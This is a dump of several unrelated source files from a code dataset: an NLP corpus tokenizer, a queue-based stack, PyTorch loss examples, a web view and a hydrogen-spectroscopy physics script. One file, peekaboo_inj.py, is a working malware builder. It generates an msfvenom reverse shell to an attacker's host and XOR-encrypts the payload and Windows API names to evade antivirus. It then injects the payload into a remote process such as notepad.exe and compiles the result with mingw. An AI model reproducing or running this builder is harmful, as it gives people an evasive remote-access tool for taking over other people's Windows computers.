collection. 
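Both iterators above call token_filter(orth, lemma, pos) and treat a None return as "drop this unit". A minimal filter consistent with that contract; the POS whitelist is an illustrative assumption, not from the original code:

def keep_content_words(orth, lemma, pos):
    # Keep lower-cased lemmas of content words only; returning None
    # drops the sentence/paragraph entirely, per the documented contract.
    kept = [l.lower() for l, p in zip(lemma, pos)
            if p in ("NN", "NNS", "VB", "VBD", "JJ")]  # assumed tag set
    return kept or None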
ETA: %s',\n n, num_total_docs, estimate_eta(start_time, n, num_total_docs))\n check_time = time.time()\n\n self._logger.info('Processed %d/%d documents in collection.', n, num_total_docs)\n if doc_id_f is not None:\n doc_id_f.close()\n\n def _iter_sentences(self, document_id_fn, paragraph_filter, token_filter):\n num_total_docs = self.destination_collection.find().count()\n check_time = time.time()\n start_time = check_time\n n = 0\n\n if document_id_fn is None:\n doc_id_f = None\n elif isinstance(document_id_fn, str):\n doc_id_f = open(document_id_fn, 'w')\n else:\n doc_id_f = document_id_fn\n\n for n, obj in enumerate(self.destination_collection.find()):\n for m, p in enumerate(obj['paragraphs']):\n if paragraph_filter is not None:\n p = paragraph_filter(p)\n if p is None:\n continue\n\n current_sent_end = 0\n\n for sent in p['sentences']:\n orth = sent['orth']\n lemma = sent['lemmas']\n pos = sent['pos']\n\n current_sent_end += len(orth)\n\n if token_filter is not None:\n tokens = token_filter(orth, lemma, pos)\n else:\n tokens = lemma\n\n if tokens is None:\n continue\n\n if tokens:\n if doc_id_f:\n doc_id_f.write('{}:{}:{}:{}\\n'.format(\n obj['doi'], m, current_sent_end - len(orth), current_sent_end\n ))\n yield tokens\n\n n += 1\n if time.time() - check_time > 5:\n self._logger.info('Processed %d/%d documents in collection. ETA: %s',\n n, num_total_docs, estimate_eta(start_time, n, num_total_docs))\n check_time = time.time()\n\n self._logger.info('Processed %d/%d documents in collection.', n, num_total_docs)\n if doc_id_f is not None and isinstance(document_id_fn, str):\n doc_id_f.close()\n\n def iter_recipe_sentence(self, token_filter=None, document_id_fn=None):\n \"\"\"Iterate over all recipe paragraphs (MIT result).\n\n :param token_filter: A filter function applied to all sentence tokens lists.\n The function will be called by filter(orth, lemma, pos)\n If this function returns None, that means drop this paragraph.\n Default filter does nothing and takes the lemma of each word.\n :type token_filter: callable\n :param document_id_fn: Filename of the file of storing document ids. 
The format is:\n doi:paragraph_id:word_start_idx:word_end_idx\n :type document_id_fn: str\n :rtype generator\n \"\"\"\n\n def paragraph_filter(p):\n if p['classification_MIT']['recipe']:\n return p\n else:\n return None\n\n return self._iter_sentences(document_id_fn=document_id_fn,\n paragraph_filter=paragraph_filter,\n token_filter=token_filter)\n\n def iter_all_sentence(self, token_filter=None, document_id_fn=None):\n return self._iter_sentences(document_id_fn=document_id_fn,\n paragraph_filter=None,\n token_filter=token_filter)\n\n def iter_recipe_paragraph(self, token_filter=None, document_id_fn=None):\n \"\"\"Iterate over all recipe paragraphs.\n\n :param token_filter: A filter function applied to all sentence tokens lists.\n The function will be called by filter(orth, lemma, pos)\n If this function returns None, that means drop this paragraph.\n Default filter does nothing and takes the lemma of each word.\n :type token_filter: callable\n :param document_id_fn: Filename of the file of storing document ids.\n :type document_id_fn: str\n :rtype generator\n \"\"\"\n\n def paragraph_filter(p):\n if p['classification_MIT']['recipe']:\n return p\n else:\n return None\n\n return self._iter_paragraphs(document_id_fn=document_id_fn,\n paragraph_filter=paragraph_filter,\n token_filter=token_filter)\n\n def iter_paragraph(self, token_filter=None, document_id_fn=None):\n \"\"\"Iterate over all paragraphs.\n\n :param token_filter: A filter function applied to all sentence tokens lists.\n The function will be called by filter(orth, lemma, pos)\n If this function returns None, that means drop this paragraph.\n Default filter does nothing and takes the lemma of each word.\n :type token_filter: callable\n :param document_id_fn: Filename of the file of storing document ids.\n :type document_id_fn: str\n :rtype generator\n \"\"\"\n\n return self._iter_paragraphs(document_id_fn=document_id_fn,\n paragraph_filter=None,\n token_filter=token_filter)\n\n def tokenize_corpus(self, object_id_list=None, clean_database=False):\n \"\"\"Tokenize all corpus in the syn_20170926.\n\n :param object_id_list: ObjectId list to tokenize.\n :type object_id_list: list\n :param clean_database: Remove old data in collection.\n :type clean_database: bool\n :returns: Statistics about number of documents processed.\n :rtype: dict\n \"\"\"\n if self.is_collection_ready() and clean_database:\n self._logger.info('Clearing old collection.')\n self.destination_collection.delete_many({})\n\n if object_id_list is None:\n num_documents = self.syn_20170926.find({}).count()\n else:\n num_documents = len(object_id_list)\n self._logger.info('Processing %d documents.', num_documents)\n\n def doc_iterator():\n if object_id_list is None:\n for _i in self.syn_20170926.find():\n yield _i\n else:\n for _i in object_id_list:\n d = self.syn_20170926.find_one({'_id': ObjectId(_i)})\n if d is None:\n raise RuntimeError('No such object %s' % _i)\n yield d\n\n statistics = {\n 'number_docs': 0,\n 'number_sentences': 0,\n 'number_words': 0\n }\n\n check_time = time.time()\n start_time = check_time\n\n for i, doc in enumerate(doc_iterator()):\n doc_token = {\n 'doi': doc['doi'],\n 'syn_20170926_id': doc['_id'],\n 'paragraphs': []\n }\n\n for j, paragraph in enumerate(doc['paragraphs']):\n processor = preprocessing.TextPreprocessor(paragraph['text'])\n cde_doc = processor.doc.user_data\n\n all_lemmas = processor.get_words(lemma=True)\n sentences = []\n for sentence in cde_doc.sentences:\n orths, pos = zip(*sentence.pos_tagged_tokens)\n lemmas = 
all_lemmas[:len(pos)]\n\n all_lemmas = all_lemmas[len(pos):]\n\n sentences.append({\n 'orth': orths,\n 'pos': pos,\n 'lemmas': lemmas\n })\n\n statistics['number_words'] += len(orths)\n statistics['number_sentences'] += 1\n\n assert len(all_lemmas) == 0\n\n doc_token['paragraphs'].append({\n 'id': j,\n 'sentences': sentences,\n 'classification_MIT': {\n 'recipe': paragraph['type'] == 'recipe'\n }\n })\n\n self.destination_collection.insert_one(doc_token)\n statistics['number_docs'] += 1\n\n if time.time() - check_time > 5:\n check_time = time.time()\n logging.info('Tokenization in progress. Current %d documents, %d sentences, %d words. ETA: %s',\n statistics['number_docs'], statistics['number_sentences'], statistics['number_words'],\n estimate_eta(start_time, i, num_documents))\n\n return statistics\n", "sub_path": "ParagraphClassification/nlp/corpus_tokenizer.py", "file_name": "corpus_tokenizer.py", "file_ext": "py", "file_size_in_byte": 14421, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "itertools.chain", "line_number": 47, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 48, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 49, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 113, "usage_type": "call"}, {"api_name": "time.time", "line_number": 124, "usage_type": "call"}, {"api_name": "time.time", "line_number": 160, "usage_type": "call"}, {"api_name": "utils.time_utils.estimate_eta", "line_number": 162, "usage_type": "call"}, {"api_name": "time.time", "line_number": 163, "usage_type": "call"}, {"api_name": "time.time", "line_number": 171, "usage_type": "call"}, {"api_name": "time.time", "line_number": 214, "usage_type": "call"}, {"api_name": "utils.time_utils.estimate_eta", "line_number": 216, "usage_type": "call"}, {"api_name": "time.time", "line_number": 217, "usage_type": "call"}, {"api_name": "bson.ObjectId", "line_number": 318, "usage_type": "call"}, {"api_name": "time.time", "line_number": 329, "usage_type": "call"}, {"api_name": "time.time", "line_number": 373, "usage_type": "call"}, {"api_name": "time.time", "line_number": 374, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 375, "usage_type": "call"}, {"api_name": "utils.time_utils.estimate_eta", "line_number": 377, "usage_type": "call"}]} +{"seq_id": "628663255", "text": "import collections\nclass MyStack:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.stack = collections.deque() # To use Queue methods append and popleft.\n self.last = -1094795586 # To track most recently added element.\n\n def push(self, x: int) -> None:\n \"\"\"\n Push element x onto stack.\n \"\"\"\n self.stack.append(x) # Add to Queue\n self.last = x # Update most recently added element\n\n def pop(self) -> int:\n \"\"\"\n Removes the element on top of the stack and returns that element.\n \"\"\"\n if len(self.stack) == 0:\n return self.last\n if len(self.stack) == 1: # if queue has only one element, just pop it and return.\n self.last = -1094795586\n return self.stack.popleft()\n # we will create a temporary deque to hold all element we pop from deque until the length reaches 2.\n temp = collections.deque()\n while len(self.stack) > 2:\n temp.append(self.stack.popleft())\n # Once length 2 is reached, we pop one element and store as cur_last. 
This will be set as self.last after popping.\n cur_last = self.stack.popleft()\n self.last = cur_last\n temp.append(cur_last)\n # to_return takes last element\n to_return = self.stack.popleft()\n self.stack = temp # assign the temporary deque to original deque\n return to_return # Return the last element\n\n def top(self) -> int:\n \"\"\"\n Get the top element.\n \"\"\"\n # simply return self.last as we are updating it each time we pop and push.\n return self.last\n\n def empty(self) -> bool:\n \"\"\"\n Returns whether the stack is empty.\n \"\"\"\n if len(self.stack):\n return False\n return True\n\n# Your MyStack object will be instantiated and called as such:\n# obj = MyStack()\n# obj.push(x)\n# param_2 = obj.pop()\n# param_3 = obj.top()\n# param_4 = obj.empty()", "sub_path": "week4/StackUsingQueue.py", "file_name": "StackUsingQueue.py", "file_ext": "py", "file_size_in_byte": 2016, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "collections.deque", "line_number": 8, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "384789419", "text": "# payload encryption functions\r\nimport argparse\r\nimport subprocess\r\nimport sys\r\nimport random\r\nimport os\r\nimport hashlib\r\nimport string\r\n\r\nclass Colors:\r\n HEADER = '\\033[95m'\r\n BLUE = '\\033[94m'\r\n GREEN = '\\033[92m'\r\n YELLOW = '\\033[93m'\r\n RED = '\\033[91m'\r\n PURPLE = '\\033[95m'\r\n ENDC = '\\033[0m'\r\n BOLD = '\\033[1m'\r\n UNDERLINE = '\\033[4m'\r\n\r\nclass PeekabooEncryptor():\r\n def __init__(self):\r\n self.XOR_PAYLOAD = self.random()\r\n self.XOR_PROC = self.random()\r\n self.XOR_DLL = self.random()\r\n\r\n def payload_key(self):\r\n return self.XOR_PAYLOAD\r\n\r\n def func_key(self):\r\n return self.random()\r\n\r\n def proc_key(self):\r\n return self.XOR_PROC\r\n\r\n def dll_key(self):\r\n return self.XOR_DLL\r\n\r\n def xor(self, data, key):\r\n key = str(key)\r\n l = len(key)\r\n output_str = \"\"\r\n\r\n for i in range(len(data)):\r\n current = data[i]\r\n current_key = key[i % len(key)]\r\n ordd = lambda x: x if isinstance(x, int) else ord(x)\r\n output_str += chr(ordd(current) ^ ord(current_key))\r\n\r\n return output_str\r\n\r\n def xor_encrypt(self, data, key):\r\n ciphertext = self.xor(data, key)\r\n ciphertext = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };'\r\n return ciphertext, key\r\n\r\n def random(self):\r\n length = random.randint(16, 32)\r\n return ''.join(random.choice(string.ascii_letters) for i in range(length))\r\n\r\ndef generate_payload(host, port):\r\n print (Colors.BLUE + \"generate reverse shell payload...\" + Colors.ENDC)\r\n msfv = \"msfvenom -p windows/x64/shell_reverse_tcp\"\r\n msfv += \" LHOST=\" + host\r\n msfv += \" LPORT=\" + port\r\n msfv += \" -f raw\"\r\n msfv += \" -o /tmp/hack.bin\"\r\n print (Colors.YELLOW + msfv + Colors.ENDC)\r\n try:\r\n p = subprocess.Popen(msfv.split(), stdout = subprocess.PIPE)\r\n p.wait()\r\n print (Colors.GREEN + \"reverse shell payload successfully generated :)\" + Colors.ENDC)\r\n except Exception as e:\r\n print (Colors.RED + \"generate payload failed :(\" + Colors.ENDC)\r\n sys.exit()\r\n\r\ndef run_peekaboo(host, port, proc_name, mode):\r\n banner = \"\"\"\r\n ##### ###### # # ## ##### #### ####\r\n # # # # # # # # # # # # #\r\n # # ##### #### ##### # # ##### ##### # # # #\r\n ##### # # # ###### # # # # # #\r\n # # # # # # # # # # # #\r\n # ###### # # # # ##### #### ####\r\n by 
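The XOR cipher in PeekabooEncryptor is symmetric: applying xor twice with the same key recovers the plaintext (the `ordd` lambda lets it accept bytes or str). A quick round-trip check against the class as defined above:

enc = PeekabooEncryptor()
key = enc.payload_key()
cipher = enc.xor(b"hello shellcode", key)  # bytes in, str out
plain = enc.xor(cipher, key)               # str in, original text out
assert plain == "hello shellcode"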
@cocomelonc, many thanks to:\r\n https://institute.sektor7.net/red-team-operator-malware-development-essentials\r\n \"\"\"\r\n print (Colors.BLUE + banner + Colors.ENDC)\r\n generate_payload(host, port)\r\n encryptor = PeekabooEncryptor()\r\n print (Colors.BLUE + \"read payload...\" + Colors.ENDC)\r\n plaintext = open(\"/tmp/hack.bin\", \"rb\").read()\r\n\r\n f_vaex = \"VirtualAllocEx\"\r\n f_op = \"OpenProcess\"\r\n f_cth = \"CreateRemoteThread\"\r\n f_wfso = \"WaitForSingleObject\"\r\n f_wpm = \"WriteProcessMemory\"\r\n f_clh = \"CloseHandle\"\r\n f_p32f = \"Process32First\"\r\n f_p32n = \"Process32Next\"\r\n f_ct32s = \"CreateToolhelp32Snapshot\"\r\n\r\n f_xor = \"XOR(\"\r\n f_inj = \"Inject(\"\r\n f_ftt = \"FindTarget\"\r\n\r\n k32_name = \"kernel32\"\r\n\r\n print (Colors.BLUE + \"process name: \" + proc_name + \"...\" + Colors.ENDC)\r\n print (Colors.BLUE + \"encrypt...\" + Colors.ENDC)\r\n f_xor, f_inj, f_ftt = encryptor.random(), encryptor.random(), encryptor.random()\r\n ciphertext, p_key = encryptor.xor_encrypt(plaintext, encryptor.payload_key())\r\n ciphertext_vaex, vaex_key = encryptor.xor_encrypt(f_vaex, encryptor.func_key())\r\n ciphertext_wpm, wpm_key = encryptor.xor_encrypt(f_wpm, encryptor.func_key())\r\n ciphertext_cth, ct_key = encryptor.xor_encrypt(f_cth, encryptor.func_key())\r\n ciphertext_wfso, wfso_key = encryptor.xor_encrypt(f_wfso, encryptor.func_key())\r\n ciphertext_clh, clh_key = encryptor.xor_encrypt(f_clh, encryptor.func_key())\r\n ciphertext_p32f, p32f_key = encryptor.xor_encrypt(f_p32f, encryptor.func_key())\r\n ciphertext_p32n, p32n_key = encryptor.xor_encrypt(f_p32n, encryptor.func_key())\r\n ciphertext_op, op_key = encryptor.xor_encrypt(f_op, encryptor.func_key())\r\n ciphertext_ct32s, ct32s_key = encryptor.xor_encrypt(f_ct32s, encryptor.func_key())\r\n ciphertext_proc, proc_key = encryptor.xor_encrypt(proc_name, encryptor.proc_key())\r\n ciphertext_k32, k32_key = encryptor.xor_encrypt(k32_name, encryptor.dll_key())\r\n\r\n tmp = open(\"peekaboo_inj.cpp\", \"rt\")\r\n data = tmp.read()\r\n\r\n data = data.replace('unsigned char my_payload[] = { };', 'unsigned char my_payload[] = ' + ciphertext)\r\n data = data.replace('unsigned char s_vaex[] = { };', 'unsigned char s_vaex[] = ' + ciphertext_vaex)\r\n data = data.replace('unsigned char s_cth[] = { };', 'unsigned char s_cth[] = ' + ciphertext_cth)\r\n data = data.replace('unsigned char s_wfso[] = { };', 'unsigned char s_wfso[] = ' + ciphertext_wfso)\r\n data = data.replace('unsigned char s_wpm[] = { };', 'unsigned char s_wpm[] = ' + ciphertext_wpm)\r\n data = data.replace('unsigned char s_op[] = { };', 'unsigned char s_op[] = ' + ciphertext_op)\r\n data = data.replace('unsigned char s_clh[] = { };', 'unsigned char s_clh[] = ' + ciphertext_clh)\r\n data = data.replace('unsigned char s_p32f[] = { };', 'unsigned char s_p32f[] = ' + ciphertext_p32f)\r\n data = data.replace('unsigned char s_p32n[] = { };', 'unsigned char s_p32n[] = ' + ciphertext_p32n)\r\n data = data.replace('unsigned char s_ct32s[] = { };', 'unsigned char s_ct32s[] = ' + ciphertext_ct32s)\r\n data = data.replace('unsigned char my_proc[] = { };', 'unsigned char my_proc[] = ' + ciphertext_proc)\r\n data = data.replace('unsigned char s_k32[] = { };', 'unsigned char s_k32[] = ' + ciphertext_k32)\r\n\r\n data = data.replace('char my_payload_key[] = \"\";', 'char my_payload_key[] = \"' + p_key + '\";')\r\n data = data.replace('char my_proc_key[] = \"\";', 'char my_proc_key[] = \"' + proc_key + '\";')\r\n data = data.replace('char s_vaex_key[] = 
\"\";', 'char s_vaex_key[] = \"' + vaex_key + '\";')\r\n data = data.replace('char s_wpm_key[] = \"\";', 'char s_wpm_key[] = \"' + wpm_key + '\";')\r\n data = data.replace('char s_cth_key[] = \"\";', 'char s_cth_key[] = \"' + ct_key + '\";')\r\n data = data.replace('char s_wfso_key[] = \"\";', 'char s_wfso_key[] = \"' + wfso_key + '\";')\r\n data = data.replace('char s_clh_key[] = \"\";', 'char s_clh_key[] = \"' + clh_key + '\";')\r\n data = data.replace('char s_p32f_key[] = \"\";', 'char s_p32f_key[] = \"' + p32f_key + '\";')\r\n data = data.replace('char s_p32n_key[] = \"\";', 'char s_p32n_key[] = \"' + p32n_key + '\";')\r\n data = data.replace('char s_op_key[] = \"\";', 'char s_op_key[] = \"' + op_key + '\";')\r\n data = data.replace('char s_ct32s_key[] = \"\";', 'char s_ct32s_key[] = \"' + ct32s_key + '\";')\r\n data = data.replace('char k32_key[] = \"\";', 'char k32_key[] = \"' + k32_key + '\";')\r\n data = data.replace('XOR(', f_xor + \"(\")\r\n data = data.replace(\"Inject(\", f_inj + \"(\")\r\n data = data.replace(\"FindTarget(\", f_ftt + \"(\")\r\n\r\n if mode == \"console\":\r\n data = data.replace(\"int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\", \"int main(void) {\")\r\n\r\n tmp.close()\r\n tmp = open(\"peekaboo-enc.cpp\", \"w+\")\r\n tmp.write(data)\r\n tmp.close()\r\n\r\n print (Colors.GREEN + \"successfully encrypt template file :)\" + Colors.ENDC)\r\n\r\n try:\r\n cmd = \"x86_64-w64-mingw32-gcc -O2 peekaboo-enc.cpp -o peekaboo.exe -m\" + mode + \" -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive >/dev/null 2>&1\"\r\n os.system(cmd)\r\n os.remove(\"peekaboo-enc.cpp\")\r\n except:\r\n print (Colors.RED + \"error compiling template :(\" + Colors.ENDC)\r\n sys.exit()\r\n else:\r\n print (Colors.YELLOW + cmd + Colors.ENDC)\r\n print (Colors.GREEN + \"successfully compiled :)\" + Colors.ENDC)\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-l','--lhost', required = True, help = \"local IP\")\r\n parser.add_argument('-p','--lport', required = True, help = \"local port\", default = '4444')\r\n parser.add_argument('-e', '--proc', required = False, help = \"process name\", default = \"notepad.exe\")\r\n parser.add_argument(\"-m\", '--mode', required = False, help = \"console or windows app\", default = \"windows\")\r\n args = vars(parser.parse_args())\r\n host, port = args['lhost'], args['lport']\r\n proc_name, mode = args['proc'], args['mode']\r\n run_peekaboo(host, port, proc_name, mode)\r\n", "sub_path": "peekaboo_inj.py", "file_name": "peekaboo_inj.py", "file_ext": "py", "file_size_in_byte": 8800, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "random.randint", "line_number": 58, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 59, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 59, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 70, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 70, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 75, "usage_type": "call"}, {"api_name": "os.system", "line_number": 170, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 171, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 174, "usage_type": "call"}, 
{"api_name": "argparse.ArgumentParser", "line_number": 180, "usage_type": "call"}]} +{"seq_id": "131474125", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\ndef myCrossEntropyLoss(outputs, labels):\n batch_size = outputs.size()[0]\n # batch_size\n tmp_outputs = F.softmax(outputs, dim=1)\n print(tmp_outputs)# compute the log of softmax values\n outputs = F.log_softmax(outputs, dim=1)\n print(outputs)# compute the log of softmax values\n outputs = outputs[range(batch_size), labels] # pick the values corresponding to the labels\n return -torch.sum(outputs)/len(labels)\n\nm = nn.LogSoftmax()\nloss = nn.NLLLoss()\n# input is of size N x C = 3 x 5\ninput = torch.randn(3, 5)\nprint(input)\n# each element in target has to have 0 <= value < C\ntarget = torch.tensor([1, 0, 4])\nprint(len(target))\noutput = loss(m(input), target)\nprint(output)\nprint(output.item())\noutput2 = myCrossEntropyLoss(input, target)\nprint(output2)\n#Mean Squared Error Loss\nmse_loss = nn.MSELoss()\noutputs = torch.randn(3, 5, requires_grad=True)\nprint(outputs)\ntargets = torch.randn(3, 5)\nloss = mse_loss(outputs, targets)\nprint(loss)\n#Categorical Cross-Entropy Loss\nce_loss = nn.CrossEntropyLoss()\noutputs = torch.randn(3, 5, requires_grad=True)\ntargets = torch.tensor([1, 0, 3], dtype=torch.int64)\nloss = ce_loss(outputs, targets)\nprint(loss)\n\n", "sub_path": "pythonML/notebooks/Pytorch/scripts/nn_loss.py", "file_name": "nn_loss.py", "file_ext": "py", "file_size_in_byte": 1239, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.nn.functional.softmax", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.nn.functional.log_softmax", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.sum", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn.LogSoftmax", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.NLLLoss", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 38, "usage_type": "attribute"}]} +{"seq_id": "503737512", "text": "from pyramid.view import view_config\nfrom swoll.models.user import User\nfrom pyramid.httpexceptions import HTTPFound\n\n\n@view_config(route_name='home', renderer='home.jinja2')\ndef home(request):\n user_id = request.cookies.get(\"user_id\")\n if user_id is not None:\n games = []\n user = User.lookup(int(user_id))\n for player in user.players:\n match = player.board.match\n games.append({\n \"board_id\": 
player.board_id,\n \"team_away\": match.team_away.name,\n \"team_home\": match.team_home.name\n })\n return {\n 'matches': games\n }\n else:\n return HTTPFound(location=\"/login/\")\n", "sub_path": "swoll/views/home.py", "file_name": "home.py", "file_ext": "py", "file_size_in_byte": 701, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "swoll.models.user.User.lookup", "line_number": 11, "usage_type": "call"}, {"api_name": "swoll.models.user.User", "line_number": 11, "usage_type": "name"}, {"api_name": "pyramid.httpexceptions.HTTPFound", "line_number": 23, "usage_type": "call"}, {"api_name": "pyramid.view.view_config", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "225110069", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 22 10:27:38 2017\r\n@author: Simon\r\n\"\"\"\r\n\r\nfrom __future__ import division\r\nimport numpy as np\r\nfrom bases_pivot_Gauss import *\r\nfrom matplotlib import pyplot as plt\r\nfrom scipy.integrate import quad\r\nfrom scipy.interpolate import interp1d\r\nfrom scipy.special import erf\r\nimport time\r\n\r\nN = len(LJmJmI())\r\n\r\n##### VALEURS NUMERIQUES #####\r\nmub = 1.3996245042 # magnéton de Bohr en MHz/G (CODATA14)\r\nme = 9.10938356e-31 # masse de l'électron en kg (CODATA14)\r\nmN = 1.672621898e-27 # masse du proton en kg (CODATA14)\r\nqe = 1.6021766208e-19 # charge de l'électron en C (CODATA14)\r\na0 = 0.52917721067e-10 # rayon de Bohr en m (CODATA14)\r\nh = 6.626070040e-34 # constante de Planck en J.s (CODATA14)\r\ngN = 5.585694702 # facteur de Landé du noyau (CODATA14)\r\nge = 2.00231930436182 # facteur de Landé de l'électron (CODATA14)\r\nc = 299792458 # vitesse de la lumière dans le vide en m/s\r\nalpha = 7.2973525664e-3 # constante de structure fine (CODATA14)\r\n# Lamb shift en MHz (n,L) (Galtier thèse) :\r\nLS = {(1,0):8172.840, (3,0):311.404, (3,1):0}\r\n# Constante de couplage en MHz (n) :\r\nA_SHF = {1:1420.405751768, 3:52.6094446}\r\n# Facteur de Landé de l'électron (n) (Indelicato)\r\ngS = {1:2.00228377, 3:2.0023152}\r\n# Largeur des niveaux en MHz (n,L) :\r\ngamma = {(1,0):0, (3,0):1.004945452, (3,1):30.192}\r\n \r\n##### HAMILTONIENS #####\r\ndef H_SFHF(E0=0): # en MHz (Hagel thèse, Brodsky67, Glass thèse) \r\n # base = 'LJFmF' \r\n H = np.zeros((N,N))\r\n for n, niv1 in enumerate(LJFmF()):\r\n for m, niv2 in enumerate(LJFmF()):\r\n if n == m: # (I·J)\r\n H[n,m] = E(niv1.n, niv1.L, niv1.J) - E0 \\\r\n + (3/16)*A_SHF[niv1.n] \\\r\n *(niv1.F*(niv1.F+1)-niv1.J*(niv1.J+1)-niv1.I*(niv1.I+1)) \\\r\n /(niv1.J*(niv1.J+1)*(niv1.L+1/2))\r\n if niv1.L != 0 and niv1.J != niv2.J \\\r\n and niv1.L==niv2.L and niv1.F==niv2.F and niv1.mF==niv2.mF: # (I·L)\r\n H[n,m] = (3/16)*A_SHF[3] \\\r\n *(-1)**(2*niv1.J+niv1.L+niv1.F+niv1.I+3/2) \\\r\n *np.sqrt((2*niv1.J+1)*(2*niv2.J+1) \\\r\n *(2*niv1.I+1)*(niv1.I+1)*niv1.I \\\r\n *(2*niv1.L+1)*(niv1.L+1)*niv1.L) \\\r\n *wigner6j(niv1.F,niv1.I,niv2.J,1,niv1.J,niv1.I) \\\r\n *wigner6j(niv1.L,niv2.J,1/2,niv1.J,niv1.L,1) \\\r\n /(niv1.L*(niv1.L+1)*(niv1.L+1/2))\r\n return H \r\n \r\ndef E(n,L,J): # Dirac + recul + Lamb Shift, pour Z=1, en MHz\r\n mu = me*mN/(me+mN)\r\n epsilon = J + 1/2 - np.sqrt((J+1/2)**2-alpha**2)\r\n E = (mu*c**2)*(1/np.sqrt(1+(alpha/(n-epsilon))**2) - 1)\r\n E -= (mu**2*c**2)*alpha**4 / ((me+mN)*8*n**4)\r\n E *= 1e-6/h # conversion en MHz\r\n E += LS[(n,L)]\r\n return E\r\n \r\ndef H_Zeeman(B): # en MHz (Hagel thèse, Glass thèse)\r\n # base = 'LmSmLmI'\r\n H = np.zeros((N,N))\r\n for n, niv in 
enumerate(LmSmLmI()):\r\n H[n,n] = (gS[niv.n]*niv.mS + (1-me/mN)*niv.mL - gN*me/mN*niv.mI)*mub*B\r\n H[n,n] -= diamagnetique(niv.n,niv.L,niv.mL)*B**2\r\n return H\r\n \r\ndef diamagnetique(n,L,mL): # en MHz/G² (Delande thèse)\r\n r_perp_2 = n**2*(5*n**2+1-3*L*(L+1))*(L**2+L-1+mL**2)/((2*L-1)*(2*L+3))\r\n return r_perp_2 * qe**2*a0**2/(8*me*h) * 1e-14 # Hz/T² -> MHz/G²\r\n\r\ndef H_Stark(B): # en MHz/(km/s) (Hagel thèse, Glass thèse)\r\n #base = 'LJmJmI'\r\n H = np.zeros((N,N))\r\n for n, niv1 in enumerate(LJmJmI()):\r\n for m, niv2 in enumerate(LJmJmI()):\r\n if niv1.mI != niv2.mI:\r\n H[n,m] = 0\r\n else:\r\n H[n,m] = R(niv1.n, niv1.L, niv2.n, niv2.L) \\\r\n *A(niv1.L,niv1.I,niv1.J,niv1.mJ,\r\n niv2.L,niv2.I,niv2.J,niv2.mJ) \\\r\n *a0*qe*B/h * 1e-7 # Hz/(T*m/s) -> MHz/(G*km/s)\r\n return H\r\n \r\ndef A(L1,I1,J1,mJ1,L2,I2,J2,mJ2):\r\n # Polarisation du champ motionnel normale à l'axe de quantification\r\n k, S = 1, 1/2 # ordre, spin\r\n return np.sum([-q*np.sin(np.pi/2)/np.sqrt(2) \\\r\n * (-1)**(S+mJ1) \\\r\n * np.sqrt((2*J1+1)*(2*J2+1)*(2*L1+1)*(2*L2+1)) \\\r\n * wigner6j(J1,k,J2,L2,S,L1) \\\r\n * wigner3j(J1,k,J2,-mJ1,q,mJ2) \\\r\n * wigner3j(L1,k,L2,0,0,0) for q in [-1,1]]) # q = delta_mI = +-1\r\n \r\ndef R(n1,L1,n2,L2):\r\n if n1==n2 and np.abs(L1-L2)==1:\r\n return 3/2*n1*np.sqrt(n1**2-max(L1,L2)**2)\r\n else:\r\n return 0\r\n\r\ndef H_2photons(rabi):\r\n H = np.zeros((N,N),dtype=complex) \r\n for i,a in enumerate(LJmJmI()):\r\n for j,d in enumerate(LJmJmI()):\r\n if a.n!=d.n and a.L==d.L and a.mJ==d.mJ and a.mI==d.mI:\r\n H[i,j] = 